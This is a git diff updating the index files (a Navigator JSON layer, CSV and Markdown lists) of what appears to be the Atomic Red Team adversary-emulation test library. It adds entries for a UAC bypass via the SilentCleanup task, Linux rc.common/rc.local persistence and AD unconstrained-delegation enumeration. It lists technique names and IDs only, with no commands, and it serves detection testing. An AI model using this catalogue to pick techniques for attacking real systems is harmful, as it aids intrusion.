diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
index 31d2834b..fbe9e18a 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
@@ -1 +1 @@
-{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]}
\ No newline at end of file
+{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index e84bab59..fda6082f 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -118,6 +118,7 @@ privilege-escalation,T1548.002,Bypass User Account Control,5,Bypass UAC using Co
privilege-escalation,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
privilege-escalation,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -159,6 +160,8 @@ privilege-escalation,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4
privilege-escalation,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
privilege-escalation,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
privilege-escalation,T1037.004,RC Scripts,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
+privilege-escalation,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
+privilege-escalation,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
privilege-escalation,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual
privilege-escalation,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt
@@ -215,6 +218,7 @@ defense-evasion,T1548.002,Bypass User Account Control,5,Bypass UAC using Compute
defense-evasion,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
defense-evasion,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
@@ -534,6 +538,8 @@ persistence,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a
persistence,T1547.010,Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt
persistence,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
persistence,T1037.004,RC Scripts,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
+persistence,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
+persistence,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
persistence,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual
persistence,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
persistence,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt
@@ -618,6 +624,7 @@ discovery,T1087.002,Domain Account,6,Adfind - Enumerate Active Directory Admins,
discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Objects,e1ec8d20-509a-4b9a-b820-06c9b2da8eb7,command_prompt
discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt
discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt
+discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell
discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv
index d4e71a68..89eb46ca 100644
--- a/atomics/Indexes/Indexes-CSV/linux-index.csv
+++ b/atomics/Indexes/Indexes-CSV/linux-index.csv
@@ -32,6 +32,8 @@ privilege-escalation,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injecti
privilege-escalation,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
privilege-escalation,T1611,Escape to Host,1,Deploy container using nsenter container escape,0b2f9520-a17a-4671-9dba-3bd034099fff,sh
privilege-escalation,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
+privilege-escalation,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
+privilege-escalation,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
privilege-escalation,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
privilege-escalation,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
privilege-escalation,T1548.001,Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
@@ -157,6 +159,8 @@ persistence,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD
persistence,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
persistence,T1136.001,Local Account,1,Create a user account on a Linux system,40d8eabd-e394-46f6-8785-b9bfa1d011d2,bash
persistence,T1136.001,Local Account,5,Create a new user in Linux with `root` UID and GID.,a1040a30-d28b-4eda-bd99-bb2861a4616c,bash
+persistence,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
+persistence,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
persistence,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
persistence,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index e3a45879..5d54166f 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -85,6 +85,7 @@ privilege-escalation,T1548.002,Bypass User Account Control,5,Bypass UAC using Co
privilege-escalation,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
privilege-escalation,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -151,6 +152,7 @@ defense-evasion,T1548.002,Bypass User Account Control,5,Bypass UAC using Compute
defense-evasion,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
defense-evasion,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
@@ -436,6 +438,7 @@ discovery,T1087.002,Domain Account,6,Adfind - Enumerate Active Directory Admins,
discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Objects,e1ec8d20-509a-4b9a-b820-06c9b2da8eb7,command_prompt
discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt
discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt
+discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell
discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 3a916e39..e7646cfb 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -227,6 +227,7 @@
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- Atomic Test #8: Disable UAC using reg.exe [windows]
+ - Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -323,6 +324,8 @@
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1037.004 RC Scripts](../../T1037.004/T1037.004.md)
- Atomic Test #1: rc.common [macos]
+ - Atomic Test #2: rc.common [linux]
+ - Atomic Test #3: rc.local [linux]
- [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md)
- Atomic Test #1: Re-Opened Applications [macos]
- Atomic Test #2: Re-Opened Applications [macos]
@@ -417,6 +420,7 @@
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- Atomic Test #8: Disable UAC using reg.exe [windows]
+ - Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
- [T1218.003 CMSTP](../../T1218.003/T1218.003.md)
- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
@@ -965,6 +969,8 @@
- T1547.012 Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1037.004 RC Scripts](../../T1037.004/T1037.004.md)
- Atomic Test #1: rc.common [macos]
+ - Atomic Test #2: rc.common [linux]
+ - Atomic Test #3: rc.local [linux]
- T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md)
- Atomic Test #1: Re-Opened Applications [macos]
@@ -1119,6 +1125,7 @@
- Atomic Test #7: Adfind - Enumerate Active Directory User Objects [windows]
- Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows]
- Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows]
+ - Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows]
- [T1069.002 Domain Groups](../../T1069.002/T1069.002.md)
- Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
- Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md
index d1576879..6499f682 100644
--- a/atomics/Indexes/Indexes-Markdown/linux-index.md
+++ b/atomics/Indexes/Indexes-Markdown/linux-index.md
@@ -122,7 +122,9 @@
- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055 Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1037.004 RC Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1037.004 RC Scripts](../../T1037.004/T1037.004.md)
+ - Atomic Test #2: rc.common [linux]
+ - Atomic Test #3: rc.local [linux]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1548.001 Setuid and Setgid](../../T1548.001/T1548.001.md)
- Atomic Test #1: Make and modify binary from C source [macos, linux]
@@ -451,7 +453,9 @@
- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1037.004 RC Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1037.004 RC Scripts](../../T1037.004/T1037.004.md)
+ - Atomic Test #2: rc.common [linux]
+ - Atomic Test #3: rc.local [linux]
- T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 6433b60d..5b6382dc 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -178,6 +178,7 @@
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- Atomic Test #8: Disable UAC using reg.exe [windows]
+ - Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -308,6 +309,7 @@
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- Atomic Test #8: Disable UAC using reg.exe [windows]
+ - Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
- [T1218.003 CMSTP](../../T1218.003/T1218.003.md)
- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
@@ -818,6 +820,7 @@
- Atomic Test #7: Adfind - Enumerate Active Directory User Objects [windows]
- Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows]
- Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows]
+ - Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows]
- [T1069.002 Domain Groups](../../T1069.002/T1069.002.md)
- Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
- Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
diff --git a/atomics/Indexes/Matrices/linux-matrix.md b/atomics/Indexes/Matrices/linux-matrix.md
index 241437be..420df707 100644
--- a/atomics/Indexes/Matrices/linux-matrix.md
+++ b/atomics/Indexes/Matrices/linux-matrix.md
@@ -23,7 +23,7 @@
